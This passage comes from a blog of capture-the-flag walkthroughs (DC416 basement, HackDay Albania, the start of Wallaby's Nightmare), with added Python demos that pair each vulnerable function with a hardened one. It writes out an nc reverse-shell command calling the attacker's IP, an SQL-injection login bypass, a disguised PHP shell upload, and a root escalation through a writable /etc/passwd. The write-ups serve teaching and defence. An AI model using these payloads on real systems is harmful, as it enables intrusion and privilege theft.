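    if any(ident == (p.st_dev, p.st_ino) for p in map(os.stat, protected)):
        return "Nope. Can't let you have the flag."
    return "Win, here's your flag: " + first_line(path)


def demo():
    """Recreate the walkthrough's three attempts in a scratch directory (same filesystem,
    so hard links work) and return each verdict."""
    with tempfile.TemporaryDirectory() as tmp:
        flag = os.path.join(tmp, "flag.txt")
        with open(flag, "w") as fh:
            fh.write("FLAG{constructed_for_the_demo}\n")    # constructed, not the real flag
        sym = os.path.join(tmp, "flagg.txt")
        os.symlink(flag, sym)
        named = os.path.join(tmp, "flagh.txt")      # hard link, 'flag' still in the name
        os.link(flag, named)
        plain = os.path.join(tmp, "test")           # hard link, innocent name
        os.link(flag, plain)
        return {
            "symlink": weak_reader(sym),
            "hardlink_flag_name": weak_reader(named),
            "hardlink_plain_name": weak_reader(plain),
            "hardened_plain_name": hardened_reader(plain, [flag]),
        }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:22s} {verdict}")
```

The inode comparison is what closes the hole: a hard link is the same file under another name, so no amount of renaming changes <b>(st_dev, st_ino)</b>. The <b>os.access</b> check is the more general fix for a setuid program, since it answers "could the user who invoked me read this without my privileges?" for any file, not just a listed one.<br />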
That's the end of the challenge :) The hard link worked because the "flag file" check evidently looks at the file name rather than the inode: <b>/tmp/flagh.txt</b> was refused, while <b>/tmp/test</b>, pointing at the same inode, was accepted. It also needed <b>/tmp</b> and <b>/home/vulnhub</b> to be on the same filesystem, and FreeBSD to allow hard-linking a file we cannot read (<b>security.bsd.hardlink_check_uid</b> is 0 by default).<br />
Author: rgolebiowski (http://www.blogger.com/profile/06575754454762912759)<br />
<br />
<b>DC416:2016 basement challenge</b> (published 2017-01-24, updated 2017-02-01)<br />
Hello,<br />
<br />
Today I would like to present a walkthrough of the dc416-2016-basement challenge.<br />
<br />
Nmap port scanning.<br />
<br />
Looking for our target, we discovered that the machine has been assigned the IP address <b>192.168.253.30</b>.<br />
<br />
Now let's check which services the target is running.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYh7c-aS4SE4F6lVt8oUdVi08OFFy4wnYC6c_uFJpbQRQX-pi1ScStmmbUQbnAhdgQrAg59avfTEfobhGiv7q5WERKwScvc76FZ_mJM0WJcpcGD3yykbBGXUmCUfIiRuCbiN32GUUsg58/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYh7c-aS4SE4F6lVt8oUdVi08OFFy4wnYC6c_uFJpbQRQX-pi1ScStmmbUQbnAhdgQrAg59avfTEfobhGiv7q5WERKwScvc76FZ_mJM0WJcpcGD3yykbBGXUmCUfIiRuCbiN32GUUsg58/s400/nmap.png" width="400" /></a></div>
<br />
OK, the <b>nmap</b> scan discovered <b>4 open ports.</b> We can see that the target uses <b>port 8080</b> as an HTTP proxy. Hmmm, interesting.<br />
<br />
Let's begin our penetration test with HTTP on <b>port 80.</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic3ZnVWxwMJRuecXPxS5uf4sUq1vFVSfJWGR4PwqLMBbHUGFDY7M6kpnDQZgmtk3VR9olVa2cNuKSG3gwMO-03MsWsi4AfvxybGn5BrlWEnK9V7yNmoQos0e88URq-4jpPv5h-wGYWPVg/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic3ZnVWxwMJRuecXPxS5uf4sUq1vFVSfJWGR4PwqLMBbHUGFDY7M6kpnDQZgmtk3VR9olVa2cNuKSG3gwMO-03MsWsi4AfvxybGn5BrlWEnK9V7yNmoQos0e88URq-4jpPv5h-wGYWPVg/s400/www.png" width="400" /></a></div>
<br />
I ran DirBuster, but it didn't find anything interesting or useful... So let's check what is hosted on <b>port 10000</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAW8S6482CxJdKjFunhKtUl0pLTdP9pOHyQYscI9wGMeHV5_M3iOZv8cs5ceD8CqsZDGA1i4aYtIR3W-vMUdZaTWiNGDbpcN2gkRkJj1p_jKLAB1smSxu4jB-JJQfH_S2Eb7p4fjR-JLU/s1600/10000.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAW8S6482CxJdKjFunhKtUl0pLTdP9pOHyQYscI9wGMeHV5_M3iOZv8cs5ceD8CqsZDGA1i4aYtIR3W-vMUdZaTWiNGDbpcN2gkRkJj1p_jKLAB1smSxu4jB-JJQfH_S2Eb7p4fjR-JLU/s400/10000.png" width="400" /></a></div>
<br />
Hmmm, maybe we should try playing with it via <b>netcat</b>?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIes0UAUIZUBAQn_YKAOt5DGjNMxNRxePSYNmNtPk_5CkY2BHbmY4uiguQh6VBE0S6miNjhBtr-eBINqd0tmQeCNmS_eOphiGkRZipdzRSPhP3QLcWwDLwSPpcZ3t97C4uUPdw5Bo9UEQ/s1600/nc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIes0UAUIZUBAQn_YKAOt5DGjNMxNRxePSYNmNtPk_5CkY2BHbmY4uiguQh6VBE0S6miNjhBtr-eBINqd0tmQeCNmS_eOphiGkRZipdzRSPhP3QLcWwDLwSPpcZ3t97C4uUPdw5Bo9UEQ/s400/nc.png" width="400" /></a></div>
<br />
Port 10000 probably runs something like <b>ping -c [number of packets] 127.0.0.1</b>, with our input used as the packet count.<br />
<br />
Maybe we can inject a command and obtain a reverse shell.<br />
The service evidently evaluates our input as a Python expression, so we can reach <b>os.system</b> through <b>__import__('os')</b> without any import statement of our own. Let's do that!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCAxjERMXkhOyIB2mmVqtUMPf8twHttwHjNSln6bVi4tpe3DPkw5hK04jtMEkqb_D9TU2ivm-obXmfJJ6JT7zEtkmWJa-O2YtM9oTHJIaJ7_sMp8wcO8YC82Q6mUuul5ErniWXvOPHK0M/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCAxjERMXkhOyIB2mmVqtUMPf8twHttwHjNSln6bVi4tpe3DPkw5hK04jtMEkqb_D9TU2ivm-obXmfJJ6JT7zEtkmWJa-O2YtM9oTHJIaJ7_sMp8wcO8YC82Q6mUuul5ErniWXvOPHK0M/s640/shell.png" width="640" /></a></div>
<br />
Very good, we executed the <b>id</b> command on the victim's OS.<br />
<br />
With a netcat listener waiting on port 53 of our machine, we can obtain a reverse shell using <b>__import__('os').system('nc -nv 192.168.56.1 53 -e /bin/sh')</b><br />
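The box's ping.py isn't reproduced on the page, so here is an added Python model of the bug class the payload implies (my code, not the challenge's; the eval-based parsing is an assumption drawn from the fact that <b>__import__('os').system(...)</b> worked): the packet count goes through <b>eval()</b>, which is what Python 2's <b>input()</b> does, so any expression runs before ping is even assembled. The hardened parser accepts only a bounded positive integer and builds a list argv, so neither eval nor a shell ever sees the input. The marker file written by the payload is a harmless stand-in for the nc reverse shell; paths are constructed for the demo.<br />

```python
import os
import shlex
import tempfile

TARGET = "127.0.0.1"
MAX_COUNT = 10


def vulnerable_ping_argv(count_text):
    """Model of the port-10000 service (assumption: the count is eval()'d, i.e. Python 2
    input() semantics).  Attacker code runs inside eval(), before ping is built, so the
    'ping' part plays no role in the attack at all."""
    count = eval(count_text)  # the bug being demonstrated
    return ["ping", "-c", str(count), TARGET]


def safe_ping_argv(count_text):
    """Parse a bounded positive integer; a list argv means no shell parses it either."""
    text = count_text.strip()
    if not (text.isascii() and text.isdigit()):   # rejects '-', '+', spaces, expressions
        raise ValueError(f"count must be a positive integer, got {text!r}")
    count = int(text)
    if not 1 <= count <= MAX_COUNT:
        raise ValueError(f"count out of range 1..{MAX_COUNT}: {count}")
    return ["ping", "-c", str(count), TARGET]


def demo_injection():
    """Feed the vulnerable parser an expression that drops a marker file, a harmless
    stand-in for __import__('os').system('nc ... -e /bin/sh').  Returns the argv the
    service would have built and whether the marker appeared."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "pwned")
        # write_text() returns the number of characters written (5), so the expression
        # still evaluates to a plausible packet count and the service carries on.
        payload = f"__import__('pathlib').Path({marker!r}).write_text('pwned') or 1"
        argv = vulnerable_ping_argv(payload)
        return argv, os.path.exists(marker)


if __name__ == "__main__":
    argv, written = demo_injection()
    print("vulnerable built:", shlex.join(argv), "| marker written:", written)
    for text in ["3", "-1", "99", "3; id", "__import__('os').system('id')"]:
        try:
            print("safe accepted:", shlex.join(safe_ping_argv(text)))
        except ValueError as exc:
            print("safe rejected:", exc)
```

Note that a literal such as <b>5</b> also passes through <b>eval()</b> unchanged, which is why the service looks like it "works" in normal use; the fix is to never evaluate input, not to filter it. Bounding the count also closes the denial-of-service angle of a very large <b>-c</b> value.<br />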
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9fgEIYJbShX5kAgtEagD3wCy7NehwMQgY2sxVgPrAVL5xgdDw3IRSjjxvzJGCh1Bu9AlJDZty457OYRc0SpleeTX7fJKLwXarBcOy9saYTKKV_ZaI9YO2IgSg9COtpxNyfnjVV-0nrFI/s1600/rev.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9fgEIYJbShX5kAgtEagD3wCy7NehwMQgY2sxVgPrAVL5xgdDw3IRSjjxvzJGCh1Bu9AlJDZty457OYRc0SpleeTX7fJKLwXarBcOy9saYTKKV_ZaI9YO2IgSg9COtpxNyfnjVV-0nrFI/s640/rev.png" width="640" /></a></div>
<br />
Excellent! We have got a limited shell.<br />
<blockquote class="tr_bq">
<b>jack@basement:~$ ls<br />ls<br />flag.txt ping.py run_ping.sh<br />jack@basement:~$ cat flag.txt<br />cat flag.txt<br />flag{j4cks_t0t4L_l4cK_0f_$uRpr1sE}</b></blockquote>
Good :)<br />
<br />
<br />
Author: rgolebiowski (http://www.blogger.com/profile/06575754454762912759)<br />
<br />
<b>HackDay Albania 2016</b> (published 2017-01-13, updated 2017-02-01)<br />
Hello,<br />
<br />
Description<br />
This was used in HackDay Albania's 2016 CTF.<br />
<br />
Scanning phase<br />
Our <b>nmap</b> scan shows that our target has been assigned the address <b>192.168.56.101</b>.<br />
<br />
Looking at the host more closely, we can see a couple of open ports.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_yZbcX6P2wZZTSujikw82eP5cvaxLq827wEdWRKPPTu7sbupwBoQdAO1AHsOJU_GXbjhZaIBQvH6PXQIKJU13vWA5NezNlzSYoKpO1C42JIRqwuZp8FFn0UTk_GzOlWqz8ZiDJGQMIsw/s1600/namp1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_yZbcX6P2wZZTSujikw82eP5cvaxLq827wEdWRKPPTu7sbupwBoQdAO1AHsOJU_GXbjhZaIBQvH6PXQIKJU13vWA5NezNlzSYoKpO1C42JIRqwuZp8FFn0UTk_GzOlWqz8ZiDJGQMIsw/s640/namp1.png" width="640" /></a></div>
<br />
Good, let's begin our penetration test with port <b>8008</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg15qxxIpKk-XO074ZSn86xlHDflTI3BZ7j7T0u182dz4Gr9EpPSuB54O7fuhIVVU0BEeQgn8Nb0DbxyZKe1f7IM_ERD0AIoFWgrOg0lZwsOj8fQY6ld1tg5n1xOGXm3WjIrdXE-WbZ7oQ/s1600/web1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg15qxxIpKk-XO074ZSn86xlHDflTI3BZ7j7T0u182dz4Gr9EpPSuB54O7fuhIVVU0BEeQgn8Nb0DbxyZKe1f7IM_ERD0AIoFWgrOg0lZwsOj8fQY6ld1tg5n1xOGXm3WjIrdXE-WbZ7oQ/s400/web1.png" width="400" /></a></div>
<br />
Nice picture. Let's look at the <b>robots.txt</b> file<br />
<blockquote class="tr_bq">
<pre>Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/</pre>
</blockquote>
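Before reaching for DirBuster it is worth looking at the list itself: every entry is the previous one with each letter shifted by one place, and the entries run through the alphabet in order except for a single one. The following added Python example (mine, not part of the CTF) parses the robots.txt shown above, computes the Caesar shift of each entry relative to the first, and reports the entries that break the ordered sequence; the one hit is the same directory the DirBuster response sizes point to.<br />

```python
import re

# The Disallow list exactly as served by the target (copied from the post above).
ROBOTS_TXT = """\
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
"""


def disallowed_paths(text):
    return re.findall(r"^Disallow:\s*(\S+)", text, flags=re.MULTILINE)


def caesar_shift(base, word):
    """Shift k in 0..25 with word == rot_k(base) over the lowercase alphabet, else None."""
    if len(base) != len(word) or not (base.isalpha() and word.isalpha()):
        return None
    shifts = {(ord(b) - ord(a)) % 26 for a, b in zip(base.lower(), word.lower())}
    return shifts.pop() if len(shifts) == 1 else None


def longest_increasing_indices(values):
    """Indices of one longest strictly increasing subsequence (O(n^2) dynamic programming)."""
    n = len(values)
    best, prev = [1] * n, [-1] * n
    for i in range(n):
        for j in range(i):
            if values[j] < values[i] and best[j] + 1 > best[i]:
                best[i], prev[i] = best[j] + 1, j
    i = max(range(n), key=best.__getitem__) if n else -1
    keep = set()
    while i != -1:
        keep.add(i)
        i = prev[i]
    return keep


def find_out_of_sequence(text):
    """Paths that are not rotations of the first entry, or that sit outside the ordered
    run of rotations.  In the CTF list the decoys advance by one shift per line, so the
    genuine directory is the one whose shift is out of place."""
    paths = disallowed_paths(text)
    words = [p.strip("/") for p in paths]
    shifts = [caesar_shift(words[0], w) for w in words]
    rotations = [i for i, s in enumerate(shifts) if s is not None]
    keep = longest_increasing_indices([shifts[i] for i in rotations])
    kept = {rotations[k] for k in keep}
    return [p for i, p in enumerate(paths) if i not in kept]


if __name__ == "__main__":
    for path in find_out_of_sequence(ROBOTS_TXT):
        print("out of sequence:", path)
```

Run on the listing above, the only out-of-sequence entry is <b>/unisxcudkqjydw/</b>, the shift-by-3 rotation filed between the shift-by-11 and shift-by-12 ones. The longest-increasing-subsequence step is what makes the detection robust: a simpler "is this entry bigger than the previous one" check would flag the neighbours of the odd entry instead of the entry itself.<br />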
Good, let's put these paths into a wordlist and run DirBuster.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8QYwNVlPw7HgZHOFmSMCDUXNouKQj8sPwQL931iml4HQmJ1FehzjFwcjbxgbZtSR_HOcAqWUUOjcXrNvKrrk2d2SAan4DHxGVVx1YDUqbBtTCzSTlgIZdO0o9HRl7fnLqj1gGA42yks/s1600/dirbus.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW8QYwNVlPw7HgZHOFmSMCDUXNouKQj8sPwQL931iml4HQmJ1FehzjFwcjbxgbZtSR_HOcAqWUUOjcXrNvKrrk2d2SAan4DHxGVVx1YDUqbBtTCzSTlgIZdO0o9HRl7fnLqj1gGA42yks/s640/dirbus.png" width="640" /></a></div>
<br />
Hmmm, <b>/unisxcudkqjydw/</b> returns a smaller response than the others (it is also the one entry that breaks the alphabetical order of the robots.txt list). So, let's look at this path more closely.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzSO6WDE0Erlb31DcDRns3OGUEZR9ovprhccb1fo8sD_jcniP-lU47feqj3nEdZAghmJx5FwUzxY7WP5Ulja2ALW5V70NW_DoiHmEPDSWJeBYaoBzyk2zjfJa5YH1qlpjMO41dYFwdZI/s1600/vuln.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzSO6WDE0Erlb31DcDRns3OGUEZR9ovprhccb1fo8sD_jcniP-lU47feqj3nEdZAghmJx5FwUzxY7WP5Ulja2ALW5V70NW_DoiHmEPDSWJeBYaoBzyk2zjfJa5YH1qlpjMO41dYFwdZI/s320/vuln.png" width="320" /></a></div>
<br />
OK, let's examine <b>/vulnbank/</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD0niWaX3gNmK1BIMJ1l4ozsC5JdNuFtfgPcbonmrWmceAWklAvdulfpkGgQvj13lS39FMVbB0NguFFYamOS_86mAuD9pyFxAHaACYp30VKAxKJEtYD_gXEbCzKelBoDeY1DMXbHTH7QA/s1600/vulnank.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD0niWaX3gNmK1BIMJ1l4ozsC5JdNuFtfgPcbonmrWmceAWklAvdulfpkGgQvj13lS39FMVbB0NguFFYamOS_86mAuD9pyFxAHaACYp30VKAxKJEtYD_gXEbCzKelBoDeY1DMXbHTH7QA/s400/vulnank.png" width="400" /></a></div>
<br />
Great! Let's click on the <b>client/</b> directory<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSt7aXZDMLIgvqnHD4MqXCkY9Pv-eW1DFve_hQ3KPpsswqnJerqQ8zeQKa8BJWJRQjX_UEc3WbrqZq1uVaDOs1GB8m9rfkzF2n1U9CQe0xtYVvOm30hsVzmHlitWvlghCRiJYeHw819I/s1600/client.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSt7aXZDMLIgvqnHD4MqXCkY9Pv-eW1DFve_hQ3KPpsswqnJerqQ8zeQKa8BJWJRQjX_UEc3WbrqZq1uVaDOs1GB8m9rfkzF2n1U9CQe0xtYVvOm30hsVzmHlitWvlghCRiJYeHw819I/s320/client.png" width="320" /></a></div>
<br />
Excellent! But we don't know any valid credentials, and the default ones don't work... Let's try SQL injection.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZkC3sgNIWwAul0ldPqvQcZNBKhEsX_OLUR4EMbjoGJyX1S6nAGnokEUhi0CMlzsU1-UvSHe8tYlzI1YQmR67izC_Eb3AAUiuTjc95FYtICJMk6fom-vzO0o3Gd847zFP9yeJxXDnWEN0/s1600/sqli.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZkC3sgNIWwAul0ldPqvQcZNBKhEsX_OLUR4EMbjoGJyX1S6nAGnokEUhi0CMlzsU1-UvSHe8tYlzI1YQmR67izC_Eb3AAUiuTjc95FYtICJMk6fom-vzO0o3Gd847zFP9yeJxXDnWEN0/s400/sqli.png" width="400" /></a></div>
<br />
And indeed, it is very interesting, isn't it? With the username <b>admin' || 1=1 #</b> and the password abcd, we are logged in!<br />
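To make the bypass concrete, here is an added Python example (mine, not the VulnBank code, whose query we never saw) against an in-memory SQLite table: the vulnerable login splices the username into the SQL text, the hardened one binds both values as parameters. SQLite is used so it runs offline, which changes the spelling of the payload: on MySQL <b>||</b> is OR and <b>#</b> starts a comment (what the screenshot used), whereas in SQLite <b>||</b> is string concatenation and <b>--</b> is the comment, so the equivalent payload there is <b>admin' OR 1=1 -- </b>. The users table and its passwords are constructed for the demo.<br />

```python
import hashlib
import sqlite3


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    """Constructed sample table; the real schema in the challenge was not shown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    db.executemany(
        "INSERT INTO users (user, pass) VALUES (?, ?)",
        [("admin", sha256("s3cret!")), ("alice", sha256("wonderland"))],
    )
    return db


def vulnerable_login(db, user, password):
    """String-built query: the username becomes part of the SQL, so a quote in it ends
    the literal and the rest of the input is parsed as SQL.  The password is hashed
    before it is spliced in, so the only injection point is the username."""
    sql = (
        f"SELECT user FROM users WHERE user='{user}' "
        f"AND pass='{sha256(password)}'"
    )
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(db, user, password):
    """Parameterised query: the driver sends the values separately from the SQL text,
    so a quote or comment marker in the username is just data."""
    row = db.execute(
        "SELECT user FROM users WHERE user=? AND pass=?", (user, sha256(password))
    ).fetchone()
    return row[0] if row else None


# SQLite spelling of the payload admin' || 1=1 # used against the MySQL-backed app.
PAYLOAD = "admin' OR 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", vulnerable_login(db, PAYLOAD, "abcd"))   # admin
    print("safe, payload       :", safe_login(db, PAYLOAD, "abcd"))         # None
    print("safe, real password :", safe_login(db, "admin", "s3cret!"))      # admin
```

With the payload the vulnerable query becomes <b>... WHERE user='admin' OR 1=1 -- ' AND pass='...'</b>: the password clause is commented out and <b>1=1</b> makes the WHERE true for every row, so the first user in the table is returned and the application treats that as a successful login. Hashing the password does nothing against this because the attacker never needs to match it.<br />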
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxO8wzT0FGTLO5F1ytgE5pqEciI1xlQ0QARyBuSmVMUEFwvmvgyLp9CyaPhGAbgXhDF0rMqPLcxW5ld9FCPkEunqhbx0h_QS_65MKaKsG00lzAVs8L7WL04N0y9BmQMFM31jVnTzgY6U/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxO8wzT0FGTLO5F1ytgE5pqEciI1xlQ0QARyBuSmVMUEFwvmvgyLp9CyaPhGAbgXhDF0rMqPLcxW5ld9FCPkEunqhbx0h_QS_65MKaKsG00lzAVs8L7WL04N0y9BmQMFM31jVnTzgY6U/s400/admin.png" width="400" /></a></div>
<br />
Excellent, we can upload a file using the Browse button.<br />
I tried to upload a <b>*.php</b> file, but got a message that the application only allows picture extensions such as <b>*.jpeg, *.jpg</b>, etc...<br />
So, let's change the extension of our PHP reverse shell from <b>*.php</b> to <b>*.jpg</b> (the check evidently looks only at the extension, not at the content).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt8Xkb-vg-vEnv5PvPJN3cYXsJFHRESuIIoQQeLfnL79744zJ8aXdkaAJ-GTqxsxlMnaHNoTwXHjD7dQ9zpF0WnYt5sP8YqRY7FIhXvcd7XkvfVydsQgwj7LZhG7YCTj7TYMPstwDPAlM/s1600/reverse.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt8Xkb-vg-vEnv5PvPJN3cYXsJFHRESuIIoQQeLfnL79744zJ8aXdkaAJ-GTqxsxlMnaHNoTwXHjD7dQ9zpF0WnYt5sP8YqRY7FIhXvcd7XkvfVydsQgwj7LZhG7YCTj7TYMPstwDPAlM/s640/reverse.png" width="640" /></a></div>
<br />
Using <b>python3.5 -c "import pty;pty.spawn('/bin/bash')"</b> we can upgrade to an interactive TTY shell.<br />
Looking at <b>config.php</b> we can find<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fPMFeOFzfkWk90t7tdo431GBf2FkJR9T2anXaIWkmXUfz9XHy_RZV4GiVTkYV0XKXdSd22zqMIzjWZkRjhaE42VNzoyfgoZxwV6PcyN4wJuhUzqIrFFG3q7qXW5x7xNybqii1FaRqbw/s1600/mysql.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fPMFeOFzfkWk90t7tdo431GBf2FkJR9T2anXaIWkmXUfz9XHy_RZV4GiVTkYV0XKXdSd22zqMIzjWZkRjhaE42VNzoyfgoZxwV6PcyN4wJuhUzqIrFFG3q7qXW5x7xNybqii1FaRqbw/s400/mysql.png" width="400" /></a></div>
<br />
Unfortunately, the databases don't contain any passwords useful to us.<br />
Looking at /etc/passwd, we can see something useful<br />
<blockquote class="tr_bq">
-rw-r--rw- 1 root root 1623 Oct 22 17:21 /etc/passwd</blockquote>
Good, <b>passwd</b> is world-writable, so we can append a user of our own with UID and GID 0 and a password hash we know (for example one generated with <b>openssl passwd -1</b>). With a hash in the second field instead of "x", the login programs check it directly, so <b>su</b> to that user gives us root.<br />
<br />
<br />
<br />
Author: rgolebiowski (http://www.blogger.com/profile/06575754454762912759)<br />
<br />
<b>Wallaby's: Nightmare (1.0.2)</b> (published 2017-01-12, updated 2017-02-01)<br />
Hi,<br />
<br />
Today I want to present Wallaby's: Nightmare (1.0.2) walkthrough.<br />
<br />
Scanning phase<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8G2y0lvMvI1Ep_kXvAv9RfnBZ47kxp8Q42HRWVtulUn6R9x80ulBU_c1rSKbwuIGFagwZmws-CH64Q01PLDApYArol_2-bK7ATLHtRPiuzO4vmpW6tLIlAAD1vLp6BBPA7RwIAIBjToM/s1600/nmap_sn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8G2y0lvMvI1Ep_kXvAv9RfnBZ47kxp8Q42HRWVtulUn6R9x80ulBU_c1rSKbwuIGFagwZmws-CH64Q01PLDApYArol_2-bK7ATLHtRPiuzO4vmpW6tLIlAAD1vLp6BBPA7RwIAIBjToM/s400/nmap_sn.png" width="400" /></a></div>
<br />
Good, we know our target has been assigned either 192.168.56.100 or 192.168.56.101.<br />
Let's investigate .101 more deeply with nmap, using the <b>-p- -sV</b> options (all ports, with service version detection).<br />
<div class="separator" style="clear: both; text-align: center;">
